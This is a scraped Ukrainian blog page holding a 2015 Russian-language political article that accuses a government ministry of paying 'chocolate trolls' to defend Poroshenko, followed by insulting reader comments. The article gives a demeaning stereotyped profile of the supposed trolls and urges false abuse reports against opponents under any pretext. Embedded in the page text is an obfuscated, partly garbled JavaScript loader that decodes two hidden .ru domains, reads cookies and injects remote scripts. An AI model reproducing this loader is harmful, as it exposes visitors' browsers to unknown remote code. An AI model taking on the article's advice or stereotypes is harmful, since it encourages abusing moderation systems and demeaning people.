хочу сюди!
 

Юлия

42 роки, рак, познайомиться з хлопцем у віці 30-50 років

Тролли минстеця или за что платят 30 шоколадных серебряников ?

Длительно пребывание в социальных сетях, навело меня на мысль написать эту статью для нормальных адекватных людей, которые понимают, что происходит в нашей стране и пытаются донести альтернативную точку зрения, не отвечающую меркантильным взглядам действующей власти.  

Итак, что мы имеем? А имеем мы полностью зависимые от олигархических групп СМИ, которые по понятным причинам, адекватный и думающий человек не воспринимает за истину. Ее там просто не может быть, это такая же пропагандистская машина, как и в России, только на много слабее и цели несколько иные. Что остается? Интернет, социальные сети, как место общения и генерирования идей, организации групп людей по интересам. но, и тут не все так просто. Если идеи, угрожают существующему положению вещей (а положение этих вещей не изменилось, изменилась только задница на золотом унитазе), то в игру вступает интернет-армия минстеця, говоря проще, шоколадные тролли, современные Иуды, которые за 30 серебрянников готовы на любую подлость и гадость (ничего в подлунном мире не изменилось за 2000 лет). 

Для адекватной реакции на указанное явление, необходимо, прежде всего знать их цели и задачи, формы и методы работы, а также методические установки, которые, к счастью, меняются редко, по причине забюрократизированности, тупости и ограниченности возможностей минстеця.

Основные задачи шоколадных Иуд :

  1. Максимально ограничить распространение информации бросающей тень или откровенно дискредитирующей Порошенко (далее «рошен»), его действия и решения
  2. Максимально сократить распространение информации об акциях, направленных на протесты и критику «рошена». 
  3. Дискредитация самих организаторов и активных участников подобных акций.
  4. Распространение информации о выдающихся успехах и достижениях «рошена».
  5. Откровенная пропаганда и запугивание, с целью создать образ незаменимости «рошена».

Исходя из вышеперечисленных задач, Иуды минстеця пользуются следующим набором «шаблонов» :

- обвинение в прокремлевской позиции, работе на Москву, на Путина и т.д.; 

- обвинение в «зраде» Батькивщины (ты почему не на фронте, раз такой патриот), предании идеалов Майдана; 

- продажности Оппоблоку(свежее), дискредитация сторонников и самой Ю.Тимошенко;

Указанное, сопровождается - безапелляционным и быстрым навешиванием ярлыков собеседнику, постоянными жалобами администрации с целью блокирования статей и комментариев, якобы оскорбительных и т.д., провокационный переход на личности с целью вызвать оскорбление или матерое высказывание в свой адрес, с последующей блокировкой (Ваш аккаунт один и Вы им дорожите, а у них их много, они ни к чему не привязаны и в этом главная проблема).

Методы выявления шоколадных троллей :

- Оценить аккаунт тролля. Как правило, он недавно создан, имеет «левое» или 1 фото. Не много друзей и публикаций, при чем публикации или на нейтральную тему или перепосты восхваляющие «рошен».

- Как правило, в аккаунте не указаны подробности о человеке, максимум регион проживания.

- Почти во всех случаях, тролле-коменты не отличаются сдержанностью, аргументацией и уважением к собеседнику, что говорит об их не высоком интеллектуальном уровне.

- \Шоколадные тролли никогда не отвечают Вам на аргументы и факты порочащие «рошена» они просто пропускают это мимо ушей и гнут свою линию.

Типичный портрет тролля:

Женщины, 30-50 лет, образование среднее специальное или высшее, не добившиеся успехов в профессиональной деятельности, несчастные в личной жизни, как правило одинокие и материально обеспечены на много ниже среднего, от чего злобные и крикливые, как в жизни так и в интернете. Троллями становятся от финансовой нужды и одиночества. 

Мужчины: 16-40 лет, образование — любое, но все имеют комплекс неполноценности, не реализованные в реальной жизни, уровень достатка — ниже среднего, и от этого очень агрессивно настроенные, как в жизни так и в сети.

В связи с этим, вступая в спор с шоколадными Иудами Вы рискуете — быть заблокированным, потерять аккаунт, друзей, свои идеи, место их распространения.

Отсюда простой вывод — бей врага его же оружием !

МГНОВЕННАЯ БЛОКАДА, ЖАЛОБА АДМИНИСТРАТОРУ ПОД ЛЮБЫМ ПРЕДЛОГОМ (ОСКОРБЛЕНИЕ, ПРОПАГАНДА СЕКСА, НАСИЛИЯ — НЕ ВАЖНО)! НИКАКИХ СПОРОВ ! ОНИ НА РАБОТЕ ! ВЫ ИМ НИЧЕГО НЕ ДОКАЖЕТЕ, НО ПОТЕРЯЕТЕ АККАУНТ !

Оригинал: БЕЗЦЕНЗОР.ИНФО

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();
1

Коментарі

126.08.15, 23:39

путенг хуйло!

    Гість: Старий Семен

    227.08.15, 00:19Відповідь на 1 від iris s

    путенг хуйло!Афторшу штирить непадєкці.... Цей комент теж напевно буде видалений.

      327.08.15, 00:31Відповідь на 2 від Гість: Старий Семен

      путенг хуйло!Афторшу штирить непадєкці.... Цей комент теж напевно буде видалений.не вішло у нее. пусть сосет лапоть))